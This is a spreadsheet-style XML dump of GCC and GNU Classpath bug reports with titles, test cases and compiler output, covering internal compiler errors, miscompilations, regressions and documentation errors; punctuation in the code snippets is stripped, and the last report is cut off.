  <si>
    <t>GCC-81875</t>
  </si>
  <si>
    <t>omp for loop optimized away</t>
  </si>
  <si>
    <t>[ Redoing https://gcc.gnu.org/ml/gcc-bugs/2017-08/msg01329.html ]
Test-case from PR81805 comment 3 expanded to be runnable:
...
extern void abort (void)
#define N 32ULL
int a[N]
const unsigned long long c = 0x7fffffffffffffffULL
void
f2_tpf_static32 (void)
{
  unsigned long long i
  #pragma omp for
  for (i = c + N i &gt; c i -= 1ULL)
    a[i - 1ULL - c] -= 4
}
__attribute__((noinline noclone)) int
test_tpf_static32 (void)
{
  int i j k
  for (i = 0 i &lt; N i++)
    a[i] = i - 25
  f2_tpf_static32 ()
  for (i = 0 i &lt; N i++)
    if (a[i] != i - 29)
      return 1
  return 0
}
int
main ()
{
  if (test_tpf_static32 ())
    abort ()
  return 0
}
...
Passes with fno-openmp fails with fopenmp.
With fopenmp the for loop is optimized away.</t>
  </si>
  <si>
    <t>GCC-57594</t>
  </si>
  <si>
    <t>[C++11] in-class static initializer can use deleted copy constructor</t>
  </si>
  <si>
    <t>This should be rejected:
struct Private
{
    Private(const Private
    Private() = default
}
struct A
{
    static constexpr Private p = Private()
}</t>
  </si>
  <si>
    <t>GCC-34443</t>
  </si>
  <si>
    <t>The GCC manual about section variable attribute is incorrect</t>
  </si>
  <si>
    <t>Since at least 3.4 the GCC manual says:
     Use the `section' attribute with an _initialized_ definition of a
     _global_ variable as shown in the example.  GCC issues a warning
     and otherwise ignores the `section' attribute in uninitialized
     variable declarations.
but this doesn't seem correct.
For example compiling the following tiny program:
	int foo __attribute__ ((__section__ (.init.data)))
	int main(int argc char **argv)
	{
	        foo = 4
	        return 0
	}
produces no warning and the section attribute is not ignored at all:
	$ readelf -S a.out | grep -A1 init.data
	[24] .init.data        PROGBITS         000000000060080c  0000080c
	0000000000000004  0000000000000000  WA       0     0     4
This is with 4.1.2 from fedora but I guess other GCC give the same result.
I would be nice to have all manuals reflecting this too.
Thanks !</t>
  </si>
  <si>
    <t>fbuihuu</t>
  </si>
  <si>
    <t>GCC-25352</t>
  </si>
  <si>
    <t>xfail within dg-do command has no effect</t>
  </si>
  <si>
    <t>If you use an xfail command within a dg-do it has no effect.  E.g this generic testcase will FAIL rather than XFAIL:
/* { dg-do preprocess { xfail *-*-* } } */
#error intentional failure!
int main(void)
{
  return 0
}
Right now none of the ~100 testcases in the testsuite using this idiom are honoring it.  So they're either now passing or unnecessarily cluttering up testsuite results.</t>
  </si>
  <si>
    <t>GCC-427</t>
  </si>
  <si>
    <t>Re: target/c++/244</t>
  </si>
  <si>
    <t xml:space="preserve"> Synopsis: Incomplete comment in RS6000 AIX XmStrDefs.h file
 Responsible-Changed-From-To: unassigned-&gt;korbb
 Responsible-Changed-By: dje
 Responsible-Changed-When: Mon Jul 24 10:54:51 2000
 Responsible-Changed-Why:
     fixinc problem (already fixed)
 State-Changed-From-To: open-&gt;closed
 State-Changed-By: dje
 State-Changed-When: Mon Jul 24 10:54:51 2000
 State-Changed-Why:
     fixinc fixed in sources GCC Oct 1999.
 http://gcc.gnu.org/cgi-bin/gnatsweb.pl?cmd=view&amp;pr=c++/244&amp;database=gcc
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-47982</t>
  </si>
  <si>
    <t>Documentation error on libgcc __udivmoddi4</t>
  </si>
  <si>
    <t>In this document:
http://gcc.gnu.org/onlinedocs/gccint/Integer-library-routines.html#Integer-library-routines
We have:
â€” Runtime Function: unsigned long __udivmoddi3 (unsigned long a unsigned long b unsigned long *c)
Which should be:
â€” Runtime Function: unsigned long __udivmoddi4 (unsigned long a unsigned long b unsigned long *c)
(Notice the function name)
Currently gcc/libgcc2.c is using __udivmoddi4 as the function name.
To fix this bug we should change gcc/doc/libgcc.texi line 109:
@deftypefn {Runtime Function} {unsigned long} __udivmoddi3 (unsigned long @var{a} unsigned long @var{b} unsigned long *@var{c})
to
@deftypefn {Runtime Function} {unsigned long} __udivmoddi4 (unsigned long @var{a} unsigned long @var{b} unsigned long *@var{c})
Sincerely</t>
  </si>
  <si>
    <t>tzuhsiang.chien</t>
  </si>
  <si>
    <t>GCC-83680</t>
  </si>
  <si>
    <t>[8 regression] Numerous regressions on arm since r256093</t>
  </si>
  <si>
    <t>Created attachment 43030
gcc arm-none-linux-gnueabi
Since r256093 I have noticed many regressions on arm* targets.
The whole picture is at: http://people.linaro.org/~christophe.lyon/cross-validation/gcc/trunk/256093/report-build-info.html</t>
  </si>
  <si>
    <t>GCC-3517</t>
  </si>
  <si>
    <t>duno probably glibc is mangled</t>
  </si>
  <si>
    <t>durring static compile source file gnuregex.c ../gcc-src/gcc/fixinc/gnuregex.c fails due to redifinition of 're_max_failures' in /path/to/my/glib
Release:
gcc-3.0
Environment:
linux madnrake 8 beta 2 (the security edition)
gcc2.9.5 glib-2.1.3(not sure on that but if i get any corrispondence then i can be more precises it seems to be at the heart of the problem)
How-To-Repeat:
Install mandrake 8.0 reinstall 8.2 beta over the top
attemp to make bootstrap static-ly.
eg: make -e LDFLAGS=-static bootstrap</t>
  </si>
  <si>
    <t>lewis</t>
  </si>
  <si>
    <t>GCC-44676</t>
  </si>
  <si>
    <t>[4.5/4.6 Regression] ICE: in loop_entry_phi_arg at graphite-sese-to-poly.c:89 with -fgraphite-identity -fprofile-generate</t>
  </si>
  <si>
    <t>Command line:
$ gcc -O2 -fgraphite-identity -fprofile-generate testcase.c
or
$ gcc -O -funswitch-loops -fgraphite-identity -fprofile-generate testcase.c
Compiler output:
$ gcc -O -funswitch-loops -fgraphite-identity -fprofile-generate testcase.c
testcase.c: In function 'extend_options':
testcase.c:2:1: internal compiler error: in loop_entry_phi_arg at graphite-sese-to-poly.c:89
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r161383 - crash
r158095 - crash
r153685 - OK
4.5 r158978 - crash
4.4 r160770 - OK (with checking)</t>
  </si>
  <si>
    <t>GCC-20098</t>
  </si>
  <si>
    <t>[4.0 Regression] Missed optimization with static const and templates</t>
  </si>
  <si>
    <t>Compiling the following code with gcc-4.0.0 (20050219) (ld-2.15) 
will result in an error at link time complaining about all_set being  
an unresolved symbol. This is a regression compared to the version some  
weeks ago.  
----------------------------------------------------------- 
templatestruct A 
{ 
 static const T all_clr = T(0) 
 static const T all_set = ~all_clr 
} 
int main() 
{ 
 A bf 
 return(bf.all_set) 
} 
-----------------------------------------------------------</t>
  </si>
  <si>
    <t>CLASSPATH-44052</t>
  </si>
  <si>
    <t>Performance problems with date formatting</t>
  </si>
  <si>
    <t>Hi there I am not entirely sure if this is a bug but it looks like it to me.
We are seeing very long load times (~900 ms) just to do a java.util.Date.toString()
I have tracked this problem down to insufficient caching of timezone information. The class where most time is spent is DateFormatSymbols.java. This class reads the LocaleInformation properties files / resource bundle and parses them to get the timezone information. The problem is that an instance of this class is created every single time we format a date or try to get timezone info.
As a test we cut down the en_us properties file to only have 1 zoneString (UTC). This sped up all calls to 'new DateFormatSymbols()' from 900 ms to ~300 ms.
As a proposed fix I think Timezone information should be cached somewhere.. Either making DateFormatSymbols a singleton or having static references to an instance in classes that use it such as TimeZone.java</t>
  </si>
  <si>
    <t>aimana</t>
  </si>
  <si>
    <t>GCC-65935</t>
  </si>
  <si>
    <t>[6 Regression] 433.milc in SPEC CPU 2006 is miscompiled</t>
  </si>
  <si>
    <t>On Linux/i686 r62283 miscompiled 433.milc in SPEC CPU 2006:
gcc -m32 -c -o com_vanilla.o -DSPEC_CPU -DNDEBUG -I. -DFN -DFAST -DCONGRAD_TMP_VECTORS -DDSLASH_TMP_LINKS  -O3 -funroll-loops -msse2 -mfpmath=sse -ffast-math -fwhole-program -flto=jobserver -fuse-linker-plugin                com_vanilla.c
gcc -m32 -c -o io_nonansi.o -DSPEC_CPU -DNDEBUG -I. -DFN -DFAST -DCONGRAD_TMP_VECTORS -DDSLASH_TMP_LINKS  -O3 -funroll-loops -msse2 -mfpmath=sse -ffast-math -fwhole-program -flto=jobserver -fuse-linker-plugin                io_nonansi.c
gcc -m32  -O3 -funroll-loops -msse2 -mfpmath=sse -ffast-math -fwhole-program -flto=jobserver -fuse-linker-plugin          control.o f_meas.o gauge_info.o setup.o update.o update_h.o update_u.o layout_hyper.o check_unitarity.o d_plaq4.o gaugefix2.o io_helpers.o io_lat4.o make_lattice.o path_product.o ploop3.o ranmom.o ranstuff.o reunitarize2.o gauge_stuff.o grsource_imp.o mat_invert.o quark_stuff.o rephase.o cmplx.o addmat.o addvec.o clear_mat.o clearvec.o m_amatvec.o m_mat_an.o m_mat_na.o m_mat_nn.o m_matvec.o make_ahmat.o rand_ahmat.o realtr.o s_m_a_mat.o s_m_a_vec.o s_m_s_mat.o s_m_vec.o s_m_mat.o su3_adjoint.o su3_dot.o su3_rdot.o su3_proj.o su3mat_copy.o submat.o subvec.o trace_su3.o uncmp_ahmat.o msq_su3vec.o sub4vecs.o m_amv_4dir.o m_amv_4vec.o m_mv_s_4dir.o m_su2_mat_vec_n.o l_su2_hit_n.o r_su2_hit_a.o m_su2_mat_vec_a.o gaussrand.o byterevn.o m_mat_hwvec.o m_amat_hwvec.o dslash_fn2.o d_congrad5_fn.o com_vanilla.o io_nonansi.o             -lm        -o milc
  Running 433.milc ref peak lto default
433.milc: copy 0 non-zero return code (exit code=1 signal=0)
WARMUPS COMPLETED
Unitarity problem on node 0 site 0 dir 0 tolerance=1.000000e-04
SU3 matrix:
0.991448 0.021247 -0.099836 -0.054012 0.051686 0.032000 
0.100302 -0.049616 0.989806 -0.028206 0.027581 -0.078778 
-0.059070 0.023841 -0.022247 -0.078163 0.994634 0.006470 
repeat in hex:
82a7e05f 9c8421c0 b159fbbd cc2c8301 eca1e2e4 4a88bfbf 
7c12f3d5 f7ba11aa 1939e0e5 a49c5e6c 0095ea4b a16c5754 
cfce59e0 209d3be4 702a8d28 2fdd37ea d75f9836 f0058a61 
...
Unitarity error count exceeded.
termination: Wed Apr 29 11:44:07 2015
Termination: status = 1</t>
  </si>
  <si>
    <t>GCC-14502</t>
  </si>
  <si>
    <t>[3.3 Regression] g++ compile fails no matching function using forward declaration of class involving inheritance</t>
  </si>
  <si>
    <t>$ cat gccbug.c
template  class BaseClass
{
    public:
        T* Ptr
}
template  class TestClass 
{
    public:
        void Func(BaseClass *refcount)
        {
        }
        TestClass()
        {
        }
        TestClass(T * ptr)
        {
            Func(ptr)
        }
        TestClass &amp; operator=(T * ptr) 
        {
            Func(ptr)
            return *this
        }
}
class DerivedClass
class DerivedClassTest : public TestClass
{
    public:
        DerivedClassTest() : TestClass() { }
        DerivedClassTest(DerivedClass * ptr) : TestClass(ptr) { }
}
class DerivedClass : public BaseClass
{
    public:
        DerivedClass() {}
}
int main(int char **)
{
    DerivedClassTest Test
    DerivedClass *Ptr = 0
    Test.Func(Ptr)
    Test = Ptr
}
$ g++ gccbug.c
gccbug.c: In constructor `TestClass::TestClass(T*) [with T = DerivedClass]':
gccbug.c:36:   instantiated from here
gccbug.c:20: error: no matching function for call to `TestClass::
   Func(DerivedClass*&amp;)'
gccbug.c:11: error: candidates are: void TestClass::Func(BaseClass*) 
   [with T = DerivedClass]
g++ versions 3.3 3.3.1 3.3.2 3.3.3 cannot compile this code.  g++ 3.1.x and
3.2.x can compile it so it looks like a 3.3 specific regression.
If the definition of DerivedClass is moved before DerivedClassTest g++ 3.3.x
does find a matching function for Func.</t>
  </si>
  <si>
    <t>stuart_hc</t>
  </si>
  <si>
    <t>GCC-21159</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] no effect warning despite cast to void*</t>
  </si>
  <si>
    <t>The gcc-4.0 manual says 
        * An expression-statement or the left-hand side of a comma 
          expression contains no side effects.  To suppress the 
          warning cast the unused expression to void.  For example an 
          expression such as `x[ij]' will cause a warning but 
          `x[(void)ij]' will not. 
This worked for earlier releases of gcc but in gcc-4.0 the cast to void 
doesn't avoid the warning. 
$ gcc -v 
Using built-in specs. 
Target: powerpc-apple-darwin7.8.0 
Configured with: /Users/bruno/data/work/gcc-4.0.0-20050410/configure 
--prefix=/Volumes/UserData/experimental-macos --enable-shared 
--enable-version-specific-runtime-libs --enable-languages=cc++ 
Thread model: posix 
gcc version 4.0.0 20050410 (prerelease) 
$ gcc -W -c foo.c 
foo.c: In function 'foo': 
foo.c:4: warning: left-hand operand of comma expression has no effect 
$ gcc -W -c bug.c  
bug.c: In function 'copy_string': 
bug.c:169: warning: left-hand operand of comma expression has no effect</t>
  </si>
  <si>
    <t>bruno</t>
  </si>
  <si>
    <t>GCC-23784</t>
  </si>
  <si>
    <t>close doesn't reset ioparm on error exit</t>
  </si>
  <si>
    <t>$ cat close.f90
program main
  close(10 status=whatever iostat=i)
  print *Hello
end program main
$ gfortran close.f90
$ ./a.out
At line 3 of file close.f90
Internal Error: Recursive library calls not allowed
$ gfortran -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.1/configure --prefix=/home/ig25 --enable-languages=cf95
Thread model: posix
gcc version 4.1.0 20050908 (experimental)</t>
  </si>
  <si>
    <t>GCC-28411</t>
  </si>
  <si>
    <t>[4.1 Regression] Illegal instruction error with -ftrapv</t>
  </si>
  <si>
    <t>I was trying to capture floating points exceptions on the Intel iMac - I am not sure what options to use but the gfortran crashes on the iMac and on Linux with these options on this program -
[pactech01:~/sage/sage20060707] dir% gfortran -c -O2 -mfpmath=sse -msse -msse2 -ffpe-trap=invalidzerooverflow -ftrapping-math -ftrapv -fmath-errno module_utilities2.f90
gfortran: Internal error: Illegal instruction (program f951)
Please submit a full bug report.
See  for instructions.
[pactech01:~/sage/sage20060707] dir% cat module_utilities2.f90
    module utilities_module
      implicit none
      integer parameter :: INT4  = SELECTED_INT_KIND(6)
      integer parameter :: INT8  = SELECTED_INT_KIND(16)
      integer parameter :: REAL4 = SELECTED_REAL_KIND(6)
      integer parameter :: REAL8 = SELECTED_REAL_KIND(12)
      save
      private
! ==============================================================================
    contains
! ------------------------------------------------------------------------------
      subroutine test_check_sums
        integer parameter :: SIZE = 100000
        integer       :: array_i4(SIZE)
        integer(INT8) :: array_i8(SIZE)
        real(REAL8)   :: array_r8(SIZE)
        real(REAL4)   :: array_r4(SIZE)
        integer       :: n
          do n = 1SIZE
            array_i4(n) = int(-3*n INT4)
            array_i8(n) = int(-3*n INT8)
            array_r4(n) = real(-3*n REAL4)
            array_r8(n) = real(-3*n REAL8)
          enddo ! n
      end subroutine test_check_sums
! ------------------------------------------------------------------------------
    end module utilities_module
! ==============================================================================
[pactech01:~/sage/sage20060707] dir% gfortran --v
Using built-in specs.
Target: i386-apple-darwin8.6.1
Configured with: ../gcc/configure --prefix=/usr/local/gfortran --enable-languages=cf95
Thread model: posix
gcc version 4.2.0 20060522 (experimental)
[pactech01:~/sage/sage20060707] dir%</t>
  </si>
  <si>
    <t>dir</t>
  </si>
  <si>
    <t>GCC-19918</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE: Segmentation fault compiling ada/ada.ads</t>
  </si>
  <si>
    <t>stage1/xgcc -Bstage1/ -B/opt/gnu/gcc/gcc-4.0.0/hppa2.0w-hp-hpux11.11/bin/ -c -g
-O2 -mdisable-indexing     -gnatpg -gnata -I- -I. -Iada -I../../gcc/gcc/ada ../.
./gcc/gcc/ada/ada.ads -o ada/ada.o
:0: internal compiler error: Segmentation fault
I believe that this was introduced this afternoon.</t>
  </si>
  <si>
    <t>GCC-42201</t>
  </si>
  <si>
    <t>[C++0x] std::vector&gt;::push_back fails</t>
  </si>
  <si>
    <t>For reasons I do not fully understand std::vector&gt;'s push_back fails because it attempts to use the (deleted) copy constructor and (copying) assignment operator. The std::vector implementation seems to support move-only objects in C++0x mode and I don't really see why that is not working here.
$ g++-4.5-20091112 -v
Using built-in specs.
COLLECT_GCC=/usr/local/bin/g++-4.5-20091112
COLLECT_LTO_WRAPPER=/usr/local/gcc-4.5-20091112/libexec/gcc/x86_64-unknown-linux-gnu/4.5.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.5-20091112/configure --prefix=/usr/local/gcc-4.5-20091112 --program-suffix=-4.5-20091112 --enable-languages=cc++
Thread model: posix
gcc version 4.5.0 20091112 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-58172</t>
  </si>
  <si>
    <t>ifcvt test failures for armv8-a</t>
  </si>
  <si>
    <t>The following test failures are regressions from GCC 4.8 for arm-none-eabi with multilib flags that include -march=armv8-a:
    gcc.target/arm/thumb-ifcvt.c scan-assembler asrne
    gcc.target/arm/thumb-ifcvt.c scan-assembler lslne
    gcc.target/arm/thumb2-cond-cmp-1.c scan-assembler cmpne
    gcc.target/arm/thumb2-cond-cmp-2.c scan-assembler cmpeq
    gcc.target/arm/thumb2-cond-cmp-3.c scan-assembler cmpgt
    gcc.target/arm/thumb2-cond-cmp-4.c scan-assembler cmpne
The failures begin with this patch:
------------------------------------------------------------------------
r197346 | ramana | 2013-04-02 04:25:50 -0700 (Tue 02 Apr 2013) | 17 lines
Add support for Cortex-A53.
2013-04-02  Ian Caulfield  
            Ramana Radhakrishnan  
        * config/arm/arm-arches.def (armv8-a): Default to cortex-a53.
        * config/arm/t-arm (MD_INCLUDES): Depend on cortex-a53.md.
        * config/arm/cortex-a53.md: New file.
        * config/arm/bpabi.h (BE8_LINK_SPEC): Handle cortex-a53.
        * config/arm/arm.md (generic_sched generic_vfp): Handle cortex-a53.
        * config/arm/arm.c (arm_issue_rate): Likewise.
        * config/arm/arm-tune.md: Regenerate
        * config/arm/arm-tables.opt: Regenerate.
        * config/arm/arm-cores.def: Add cortex-a53.
------------------------------------------------------------------------
If the tests aren't expected to use conditional instructions for armv8-a then they should be skipped for use of that flag.</t>
  </si>
  <si>
    <t>CLASSPATH-22757</t>
  </si>
  <si>
    <t>javah complains if native method called from static initializer</t>
  </si>
  <si>
    <t xml:space="preserve">If a static initializer calls a native method then gnu.classpath.tools.JavahMain emits:
*** Couldn't bind native method Java_Foo_bar ***
*** or Java_Foo_bar__ ***
Here is a small test case:
/* Foo.java
 * Compile with:
 *   jikes-sablevm Foo.java
 *   sablevm -Y -c /usr/share/java/cp-tools.jar:. gnu.classpath.tools.JavahMain -o Foo.h Foo
 */
public class Foo {
  private static native void bar()
  static { bar() }
  static void foo(int a) { bar() }
  void foo() { bar() }
}
If you comment out the static initializer then javah gives no message otherwise it gives the message above.  Note that static methods and non-static methods calling native methods are ok it is only the static initializer that is causing the problem.
Versions:
 jikes-sablevm  1.1.5-1
 sablevm        1.1.5-1
 classpath-tool 0.0.20020812-1
 linux          2.6.3-1-686
</t>
  </si>
  <si>
    <t>GCC-80101</t>
  </si>
  <si>
    <t>ICE in store_data_bypass_p at recog.c:3737</t>
  </si>
  <si>
    <t>Following test-case ICE with target compiler:
$ cat /tmp/tmpczflhfjq.i
int b
void e()
int c ()
{
  struct
  {
    int a[b]
  } d
  if (d.a[0])
    e ()
}
$ ppc64le-linux-gnu-gcc -mno-sched-epilog -Ofast -mcpu=power6 /tmp/tmpczflhfjq.i
/tmp/tmpczflhfjq.i: In function â€˜câ€™:
/tmp/tmpczflhfjq.i:13:1: internal compiler error: in store_data_bypass_p at recog.c:3737
 }
 ^
0xadde35 store_data_bypass_p(rtx_insn* rtx_insn*)
	.././../gcc/recog.c:3737
0x1007635 internal_insn_latency
	/home/marxin/BIG/buildbot/slave/gcc-master-build-ppc64le-weekend/build/builddir/gcc/insn-automata.c:121583
0x1007635 insn_latency(rtx_insn* rtx_insn*)
	/home/marxin/BIG/buildbot/slave/gcc-master-build-ppc64le-weekend/build/builddir/gcc/insn-automata.c:122092
0x1195b3a dep_cost_1(_dep* unsigned int)
	.././../gcc/haifa-sched.c:1484
0x119798e dep_cost(_dep*)
	.././../gcc/haifa-sched.c:1506
0x119798e priority
	.././../gcc/haifa-sched.c:1657
0x1197a7f set_priorities(rtx_insn* rtx_insn*)
	.././../gcc/haifa-sched.c:7195
0xb1992d compute_priorities()
	.././../gcc/sched-rgn.c:3015
0xb1c60d schedule_region
	.././../gcc/sched-rgn.c:3108
0xb1c60d schedule_insns()
	.././../gcc/sched-rgn.c:3506
0xb1cd7d schedule_insns()
	.././../gcc/sched-rgn.c:3491
0xb1cd7d rest_of_handle_sched2
	.././../gcc/sched-rgn.c:3730
0xb1cd7d execute
	.././../gcc/sched-rgn.c:3866</t>
  </si>
  <si>
    <t>GCC-28711</t>
  </si>
  <si>
    <t>ICE on invalid initializer for multidimensional array</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since at least GCC 2.95.3:
===========================
template struct A
{
  int x[1][1]
  A() : x((int[1][]){{0}}) {}
}
A a
===========================
bug.cc: In constructor 'A &gt;::A()':
bug.cc:4: error: multidimensional array must have bounds for all dimensions except the first
bug.cc: In constructor 'A &gt;::A() [with int  = 0]':
bug.cc:7:   instantiated from here
bug.cc:4: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in tsubst_copy_and_build at cp/pt.c:9085
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-45044</t>
  </si>
  <si>
    <t>Different named COMMON block size: No warning</t>
  </si>
  <si>
    <t>The following program is invalid Fortran as the common block size is different. (This is only allowed for blank commons.) However no diagnostics is printed. If one reverses the order of TWO and ONE a warning is printed. Actually I like the warning of g95 which prints the size.
NAG:
  Error: Inconsistent definitions of COMMON block COM in program-units TWO and ONE
g95:
  Warning (121): COMMON block 'com' is 8 bytes at (1) and 12 bytes at (2)
gfortran with ONE and TWO swapped:
  Warning: Named COMMON block 'com' at (1) shall be of the same size
subroutine two()
integer :: a b c
common /com/ a b c
end
subroutine one()
integer :: a b
common /com/ a b
end</t>
  </si>
  <si>
    <t>GCC-42086</t>
  </si>
  <si>
    <t>FAIL: gcc.target/ia64/fptr-1.c execution test</t>
  </si>
  <si>
    <t>After the linker bug:
http://www.sourceware.org/bugzilla/show_bug.cgi?id=10955
is fixed I got:
FAIL: gcc.target/ia64/fptr-1.c execution test
since GP is no longer _GLOBAL_OFFSET_TABLE_. In fact GP is
the same as _GLOBAL_OFFSET_TABLE_ is by accident. I don't
know how to make this testcase to work with the new linker.</t>
  </si>
  <si>
    <t>GCC-30807</t>
  </si>
  <si>
    <t>postreload bug (might be generic in trunk)</t>
  </si>
  <si>
    <t>I can only reproduce this problem on the sh target with a gcc version 3.4.3. However my analysis makes me believe the problem still exists on the trunk.
After greg I have the following sequence :
(insn:HI 11 10 12 0 (set (reg/v/f:SI 2 r2 [orig:160 PrivateData_p ] [160])
        (const_int 128 [0x80])) 122 {movsi_i} (nil)
    (nil))
(insn:HI 12 11 134 0 (set (reg/v/f:SI 2 r2 [orig:160 PrivateData_p ] [160])
        (plus:SI (reg/v/f:SI 2 r2 [orig:160 PrivateData_p ] [160])
            (reg:SI 3 r3 [orig:162 Device_p ] [162]))) 23 {*addsi3_compact} (insn_list 10 (insn_list 11 (nil)))
    (expr_list:REG_EQUAL (plus:SI (reg:SI 3 r3 [orig:162 Device_p ] [162])
            (const_int 128 [0x80]))
        (nil)))
...
(insn:HI 16 135 17 0 (set (reg:SI 1 r1 [166])
        (const_int 188 [0xbc])) 122 {movsi_i} (nil)
    (nil))
(insn:HI 17 16 18 0 (set (reg:SI 1 r1 [166])
        (plus:SI (reg:SI 1 r1 [166])
            (reg/v/f:SI 2 r2 [orig:160 PrivateData_p ] [160]))) 23 {*addsi3_compact} (insn_list 16 (nil))
    (expr_list:REG_EQUAL (plus:SI (reg:SI 3 r3 [orig:162 Device_p ] [162])
            (const_int 316 [0x13c]))
        (nil)))
'reload_combine' decides to optimize insns 16/17. After the optimisation there is a 'continue' and reload_combines tries other pattern.
The problem is that with this 'continue' reg_state[regno] was is updated with the other uses (here r2).
later on insn 11/12 are optimized away believing that r2 is dead because not makrked in the reg_state use list leaving it undefined.
The problem is very difficult to isolate (didn't succeed on trunk with i686) but by reading the postreload code the bug seems latent.</t>
  </si>
  <si>
    <t>christian.bruel</t>
  </si>
  <si>
    <t>GCC-8077</t>
  </si>
  <si>
    <t>Problems with -o option unrecognized option -auxbase-strip</t>
  </si>
  <si>
    <t>Current gcc cvs snapshots stop compiling with an error: unrecognized
option `-auxbase-striphello.o' message when there is no separating 
white space between the -o specifier and the argument. The separator is not
required for other c and c++ compilers. Previous gcc versions compile the
following example without a problem. Is this new behaviour mandated
by the standard?
Release:
3.3 20020927 (experimental)
Environment:
System: Linux kiste 2.4.18 #8 Sat Mar 9 15:33:15 CET 2002 i686 unknown
GNU ld version 2.13.90.0.4 20020814
Architecture: i686	
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-languages=cc++f77objc --enable-__cxa_atexit
How-To-Repeat:
hello.c
int main() {}
gcc -v -c hello.c -ohello.o
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-languages=cc++f77objc --enable-__cxa_atexit
Thread model: posix
gcc version 3.3 20020927 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3/cc1 -quiet -v -D__GNUC__=3 -D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=0 hello.c -quiet -dumpbase hello.c -auxbase-striphello.o -version -o /tmp/ccVVczMk.s
cc1: error: unrecognized option `-auxbase-striphello.o'
GNU C version 3.3 20020927 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 3.3 20020927 (experimental).</t>
  </si>
  <si>
    <t>GCC-1805</t>
  </si>
  <si>
    <t>formated 'cout'-output is wrong</t>
  </si>
  <si>
    <t>Formating cout-output doesn't work correct with
string-variables.
what works is:
Release:
unknown
Environment:
gcc 2.95.2 libs from SuSE 7.0 Athlon
(Reading specs from /usr/lib/gcc-lib/i486-suse-linux/2.95.2/specs
gcc version 2.95.2 19991024 (release))
How-To-Repeat:
Test File HW.cpp like follows:
g++ -Wall HW.cpp -o hw
hw</t>
  </si>
  <si>
    <t>alexander.kuchler</t>
  </si>
  <si>
    <t>GCC-82340</t>
  </si>
  <si>
    <t>volatile ignored in compound literal</t>
  </si>
  <si>
    <t>Consider the function f below:
int f(void) {
  volatile char *p = (volatile char[1]){1}
  for (int i=1 i&lt;10 i++) *p=4
  return *p
}
Volatile access is a visible side-effect so one may expect the generated code for the function f to do â€œsomethingâ€ nine times for some definition of â€œsomethingâ€.
In GCC 7.2 and in gcc.godbolt.org's current snapshot of â€œgcc (trunk)â€ the function f is compiled to:
f:
        movl    $4 %eax
        ret
Command: gcc -O3 -std=c11 -xc -pedantic -S t.c
Link: https://godbolt.org/g/4Ua1Ud
I would expect function f to be compiled to something that ressembles the code produced for function g or the code produced by Clang for f:
int g(void) {
  volatile char t[1] = {1}
  volatile char *p = t
  for (int i=1 i&lt;10 i++) *p=4
  return *p
}
g:
        movb    $1 -1(%rsp)
        movb    $4 -1(%rsp)
        movb    $4 -1(%rsp)
        movb    $4 -1(%rsp)
        movb    $4 -1(%rsp)
        movb    $4 -1(%rsp)
        movb    $4 -1(%rsp)
        movb    $4 -1(%rsp)
        movb    $4 -1(%rsp)
        movb    $4 -1(%rsp)
        movsbl  -1(%rsp) %eax
        ret</t>
  </si>
  <si>
    <t>pascal_cuoq</t>
  </si>
  <si>
    <t>GCC-45042</t>
  </si>
  <si>
    <t>[4.6 regression] Failed to bootstrap</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 162447 gave
cc1: warnings being treated as errors
../../src-trunk/lto-plugin/lto-plugin.c: In function 'translate':
../../src-trunk/lto-plugin/lto-plugin.c:215: error: format '%lu' expects type 'long unsigned int' but argument 5 has type 'int'
make[6]: *** [lto-plugin.lo] Error 1</t>
  </si>
  <si>
    <t>GCC-385</t>
  </si>
  <si>
    <t>Internal compiler error.</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-ID: 
 Date: Fri 16 Jun 2000 12:33:29 +0200
 This is a multi-part message in MIME format.
 --------------7BB790641CD0836018EE97F4
 Content-Type: text/plain charset=iso-8859-2
 Content-Transfer-Encoding: 7bit
 hello
 found an internal compiler error in g++ while accessing the std::vector
 procs
 like 
	 procs.stack.push( symbols[c].number )
 instead of 
	 procs[d].stack.push( symbols[c].number )
 .
 *.ii is attached.
 &gt; g++ -v --save-temps -O3 -Wall -c gcct2vpt_main.cpp
 Reading specs from
 /usr/freeware/lib/gcc-lib/mips-sgi-irix6.2/2.95.2/specs
 gcc version 2.95.2 19991024 (release)
  /usr/freeware/lib/gcc-lib/mips-sgi-irix6.2/2.95.2/cpp -lang-c++ -v
 -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -Dunix
 -Dmips -Dsgi -Dhost_mips -DMIPSEB -D_MIPSEB -DSYSTYPE_SVR4 -D_LONGLONG
 -D_SVR4_SOURCE -D_MODERN_C -D__DSO__ -D__unix__ -D__mips__ -D__sgi__
 -D__host_mips__ -D__MIPSEB__ -D_MIPSEB -D__SYSTYPE_SVR4__ -D_LONGLONG
 -D_SVR4_SOURCE -D_MODERN_C -D__DSO__ -D__unix -D__mips -D__sgi
 -D__host_mips -D__MIPSEB -D__SYSTYPE_SVR4 -Asystem(unix) -Asystem(svr4)
 -Acpu(mips) -Amachine(sgi) -D__EXCEPTIONS -D__CHAR_UNSIGNED__
 -D__OPTIMIZE__ -Wall -D__LANGUAGE_C -D_LANGUAGE_C -DLANGUAGE_C
 -D__SIZE_TYPE__=unsigned int -D__PTRDIFF_TYPE__=int -D__EXTENSIONS__
 -D_SGI_SOURCE -D_MIPS_FPSET=32 -D_MIPS_ISA=_MIPS_ISA_MIPS3 -D_ABIN32=2
